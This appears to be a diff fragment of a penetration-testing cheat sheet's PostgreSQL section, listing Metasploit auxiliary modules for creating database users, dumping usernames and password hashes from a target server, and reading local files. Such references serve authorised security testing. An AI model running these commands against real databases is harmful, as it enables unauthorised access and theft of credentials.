curtishoughton/Penetration-Testing-Cheat-Sheet/PostgreSQL/readme.md

 `use auxiliary/admin/postgres/postgres_sql`
 `set SQL CREATE USER <username>;`

+### Dump PostGreSQL Usernames and Password Hashes

+Setting the RHOST value to the target server and using the following auxiliary module:

+`use auxiliary/scanner/postgres/postgres_hashdump`

 ### Read Local File

 The following auxiliary module can be used to read a file from the local file system: